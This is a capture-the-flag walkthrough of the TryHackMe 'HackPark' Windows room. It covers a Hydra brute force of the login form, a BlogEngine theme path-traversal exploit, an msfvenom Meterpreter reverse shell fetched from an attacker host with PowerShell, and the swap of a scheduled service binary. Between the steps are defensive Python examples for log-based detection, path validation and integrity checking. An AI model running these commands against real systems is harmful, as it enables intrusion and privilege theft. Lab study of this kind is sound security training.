【THM】HackPark-Practice

Brute-force a website login with Hydra, identify and use a public vulnerability, then escalate your privileges on this Windows machine!

nmap -p- -sC -sV -T4 10.10.173.96
Nmap scan report for 10.10.173.96
Host is up (0.18s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: hackpark | hackpark amusements
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
3389/tcp open ssl/ms-wbt-server?
| rdp-ntlm-info:
| Target_Name: HACKPARK
| NetBIOS_Domain_Name: HACKPARK
| NetBIOS_Computer_Name: HACKPARK
| DNS_Domain_Name: hackpark
| DNS_Computer_Name: hackpark
| Product_Version: 6.3.9600
|_ System_Time: 2024-01-16T02:39:12+00:00
| ssl-cert: Subject: commonName=hackpark
| Not valid before: 2024-01-15T02:32:51
|_Not valid after: 2024-07-16T02:32:51
|_ssl-date: 2024-01-16T02:39:16+00:00; -2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Deploy the vulnerable Windows machine

What's the name of the clown displayed on the homepage?


Reverse Image Search


pennywise

Using Hydra to brute-force a login

We need to find a login page to attack and identify what kind of request the form makes to the web server. Typically a web server handles two types of request: a GET request, used to request data from the web server, and a POST request, used to send data to the server.

You can check the request a form makes by right-clicking the login form, inspecting the element, and reading the value in the method field. You can also identify this by intercepting the traffic with BurpSuite (other HTTP methods can be found here).


Now that we know the request type and have the URL of the login form, we can start brute-forcing accounts.


hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'


hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.173.96 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=e0VQW1OyOsSO1Pdw9d07aVZqCjyBfmFBIb34zB7IhwXcWzQFbgUbJ0FOes5nGqVJUUvAOPV7Y%2B9JZO4NQEuOfkZjFMGMAn%2FvrFKmUmIsJ7a6xdi3Hm5n%2FahW0rtAlatHP8BQoriihsDJX5werhSd0PTWtH13w0xW5qHLS6uPq6WBzqMYx7yRmNR097yxiJxCPdaYp797EIbyAdZjBpZn5Xsdkw%2BI3Z7QtTAQt5OwZcySyWzFdbslAIS4EeVaCbohFKZaL2WdwOcQE2uf3%2FJmbtOslb0fOnFFRwFtIINjXRW2hDGw1pZgIXwFvb35nFNzf%2F15uNqVCcB2MFw0pIcercoZWl2JhvZzDBesA0EBxdLGyZCv&__EVENTVALIDATION=2CPNzhy6Cft1CPuLIxknkCdfc045nSfSR8%2FaDmqbjNq8qzSR%2Bqz5jcsv3G9XJzMj6ZDIXO6O2l8Q7j2EGgCETLa3Uaw%2BXEiHSr%2FeBgnBpTYcf0sIM576%2BHjlmUJxSWDekqGiuaanY6051zBx9jblKUqWF8LNswAHeBd7dqXzYVUDYpr6&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=%E7%99%BB%E5%BD%95:Login Failed" -vv


login: admin password: 1qaz2wsx
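The brute force above, seen from the server side, as an added detection example (this is not part of the write-up and not Hydra's output): a small Python scanner over IIS W3C-style log lines that flags a client sending many login POSTs within a minute and marks the burst as successful when a 302 redirect follows it. The field list, the log lines and the 10-per-minute threshold are constructed for the demo; only the attack box address 10.11.63.201 and the /Account/login.aspx path come from the write-up.

```python
"""Spot a form-login password-guessing burst in IIS W3C log lines.

Added detection example, not part of the write-up or of Hydra: the run above
shows up in the web server log as a burst of POSTs to /Account/login.aspx from
one client address, each answered 200 (the page says "Login Failed"), until a
302 redirect marks the guess that worked. The field list and log lines below
are constructed for the demo, not captured from the room's machine.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

LOGIN_PATHS = {"/Account/login.aspx", "/wp-login.php"}   # assumed form endpoints
ATTACKER = "10.11.63.201"                                # attack box address from the write-up


def build_sample_log():
    """Constructed W3C-style log: one legitimate login, then a Hydra-like burst."""
    lines = [
        "#Fields: date time cs-method cs-uri-stem sc-status c-ip",
        "2024-01-16 03:04:58 GET /Account/login.aspx 200 192.0.2.10",
        "2024-01-16 03:04:59 POST /Account/login.aspx 200 192.0.2.10",  # one mistyped password
        "2024-01-16 03:05:00 POST /Account/login.aspx 302 192.0.2.10",  # then success
    ]
    for sec in range(1, 13):  # twelve failed guesses, one per second
        lines.append(f"2024-01-16 03:05:{sec:02d} POST /Account/login.aspx 200 {ATTACKER}")
    lines.append(f"2024-01-16 03:05:13 POST /Account/login.aspx 302 {ATTACKER}")  # guess succeeded
    return "\n".join(lines)


def parse_w3c(text):
    """Yield one dict per record, using the #Fields directive as the column key."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        if fields is None or len(parts) != len(fields):
            continue  # malformed or pre-header line: skip rather than crash
        rec = dict(zip(fields, parts))
        rec["ts"] = datetime.strptime(f"{rec['date']} {rec['time']}", "%Y-%m-%d %H:%M:%S")
        yield rec


def find_bruteforce(text, threshold=10, window=timedelta(seconds=60)):
    """Return {client_ip: {"attempts": peak login POSTs within `window`, "success": bool}}
    for every client whose login POST rate reached `threshold`."""
    recent = defaultdict(deque)   # per-IP timestamps of login POSTs inside the window
    peak = defaultdict(int)
    succeeded = set()
    for rec in parse_w3c(text):
        if rec["cs-method"] != "POST" or rec["cs-uri-stem"] not in LOGIN_PATHS:
            continue
        ip = rec["c-ip"]
        q = recent[ip]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > window:
            q.popleft()
        peak[ip] = max(peak[ip], len(q))
        # A redirect after a flagged burst is the guess that worked: treat it as a compromise.
        if rec["sc-status"] == "302" and peak[ip] >= threshold:
            succeeded.add(ip)
    return {ip: {"attempts": n, "success": ip in succeeded}
            for ip, n in peak.items() if n >= threshold}


if __name__ == "__main__":
    for ip, info in find_bruteforce(build_sample_log()).items():
        print(f"{ip}: {info['attempts']} login POSTs/min, credential guessed: {info['success']}")
```

In a real deployment the `#Fields:` line comes from the IIS log itself and normally carries more columns; the parser keys on the field names, so extra columns are fine. Tune the threshold to the site's normal failed-login rate, and treat the success flag as an incident rather than an alert, since at that point the account is already in the attacker's hands.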


Below is a mini cheatsheet:

| Command | Description |
| --- | --- |
| `hydra -P <wordlist> -v <ip> <protocol>` | Brute force against a protocol of your choice |
| `hydra -v -V -u -L <username list> -P <password list> -t 1 -u <ip> <protocol>` | You can use Hydra to brute-force usernames as well as passwords. It will loop through every combination in your lists. (-vV = verbose mode, showing login attempts) |
| `hydra -t 1 -V -f -l <username> -P <wordlist> rdp://<ip>` | Attack a Windows Remote Desktop with a password list. |
| `hydra -l <username> -P .<password list> $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'` | Craft a more specific request for Hydra to brute force. |

Compromise the machine


https://www.exploit-db.com/exploits/46353

We can see:

http://10.10.173.96/admin/app/editor/editpost.cshtml


Upload it.


10.10.173.96/?theme=../../App_Data/files
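The `?theme=../../App_Data/files` request above works because the application builds a filesystem path from the theme parameter without checking where the result ends up. As an added illustration in Python (not BlogEngine.NET's own code; `THEMES_ROOT` and the theme-name rule are assumptions made for the demo), here is that unsafe join beside a hardened resolver that allow-lists the name and then verifies the normalised path is still under the themes root.

```python
"""Unsafe versus hardened handling of a `theme` query parameter.

Added illustration in Python, not BlogEngine.NET's own code: the public
exploit linked above works because a `theme` parameter is joined onto a
directory path without validation, so ../../App_Data/files walks out of the
themes folder. THEMES_ROOT is an assumed layout chosen for the demo.
"""
import posixpath
import re

THEMES_ROOT = "/srv/site/Custom/Themes"   # assumed, not the real install path

# A theme name is one path component: letters, digits, '-' and '_' only.
THEME_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def unsafe_theme_dir(theme):
    """The vulnerable pattern: trust the parameter and join it onto the root."""
    return posixpath.normpath(posixpath.join(THEMES_ROOT, theme))


def safe_theme_dir(theme):
    """Return the theme directory, or None when the name must be rejected."""
    # Layer 1: allow-list the syntax. This alone stops '..', '/', '\\' and empty names.
    if not THEME_NAME.fullmatch(theme):
        return None
    # Layer 2: normalise and confirm the result is still beneath the root, so the
    # join stays safe even if someone later loosens the pattern above.
    resolved = posixpath.normpath(posixpath.join(THEMES_ROOT, theme))
    if posixpath.commonpath([THEMES_ROOT, resolved]) != THEMES_ROOT:
        return None
    return resolved


def audit(candidates):
    """Run both handlers over a list of inputs; returns {input: (unsafe, hardened)}."""
    return {c: (unsafe_theme_dir(c), safe_theme_dir(c)) for c in candidates}


if __name__ == "__main__":
    samples = ["Standard", "../../App_Data/files", "..\\..\\App_Data", "/etc", ""]
    for name, (bad, good) in audit(samples).items():
        print(f"{name!r:28} unsafe -> {bad!r:32} hardened -> {good!r}")
```

Note the backslash case: on a POSIX path library it is an ordinary character and the unsafe join looks harmless, but IIS on Windows treats `\` as a separator, so the same input would traverse there. That is why the allow-list (layer 1) rejects it outright rather than relying on normalisation alone.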

Windows Privilege Escalation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.63.201 LPORT=9001 -f exe > shell.exe
powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:80/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'"
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.11.63.201
lhost => 10.11.63.201
msf6 exploit(multi/handler) > set lport 9001
lport => 4445
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run


Enumerate the machine further

What is the name of the abnormal service running?

powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/winPEAS.bat' -OutFile 'C:\Windows\Temp\winPEAS.bat'"


WindowsScheduler.exe

What is the name of the binary you’re supposed to exploit?

Have you checked for logs for the abnormal service?


Using this abnormal service, escalate your privileges!

powershell -c "Invoke-WebRequest -Uri 'http://10.11.63.201:8000/shell.exe' -OutFile 'C:\Program Files (x86)\SystemScheduler\shell.exe'"
meterpreter > mv Message.exe Message.bak
meterpreter > mv shell.exe Message.exe
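The escalation step above works because the account the web shell runs as can write into the SystemScheduler folder, so a payload renamed to Message.exe is launched by the scheduler with the scheduler's privileges. As an added defensive example, not part of the write-up, the Python below baselines a service folder by SHA-256 and reports exactly that swap (Message.exe modified, Message.bak added). The folder and binaries are constructed stand-ins created in a temporary directory, not the real installation.

```python
"""Baseline-and-verify integrity check for a service's program folder.

Added defensive example, not part of the write-up: the escalation above drops
a payload into the SystemScheduler folder and renames it over Message.exe, so
the scheduler runs the payload with its own (higher) privileges. Hashing the
folder against a baseline catches the swap: Message.exe changes and a
Message.bak sibling appears. The folder and files here are constructed
stand-ins created in a temporary directory, not the real installation.
"""
import hashlib
import os
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(folder):
    """Map every file under `folder` (relative path) to its SHA-256."""
    out = {}
    for root, _dirs, files in os.walk(folder):
        for name in files:
            full = os.path.join(root, name)
            out[os.path.relpath(full, folder)] = sha256_file(full)
    return out


def verify(folder, baseline):
    """Diff the folder against a stored snapshot; any non-empty list is a finding."""
    current = snapshot(folder)
    return {
        "modified": sorted(k for k in baseline if k in current and current[k] != baseline[k]),
        "added": sorted(k for k in current if k not in baseline),
        "missing": sorted(k for k in baseline if k not in current),
    }


def demo():
    """Recreate the swap from the write-up on constructed files and return the diff."""
    with tempfile.TemporaryDirectory() as folder:
        def put(name, data):
            with open(os.path.join(folder, name), "wb") as f:
                f.write(data)

        put("WindowsScheduler.exe", b"constructed stand-in for the scheduler binary")
        put("Message.exe", b"constructed stand-in for the original Message.exe")
        baseline = snapshot(folder)   # taken while the folder is known-good

        # The swap: original moved aside, payload takes its name.
        os.replace(os.path.join(folder, "Message.exe"), os.path.join(folder, "Message.bak"))
        put("Message.exe", b"constructed stand-in for a dropped payload")

        return verify(folder, baseline)


if __name__ == "__main__":
    print(demo())
```

The hash check is the detective control; the preventive one is the folder ACL: the account the web application runs as should have no write access to any folder whose binaries a higher-privileged service executes. Store the baseline and run the check from a context the web user cannot modify, otherwise whoever can replace Message.exe can re-baseline as well.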



Privilege Escalation Without Metasploit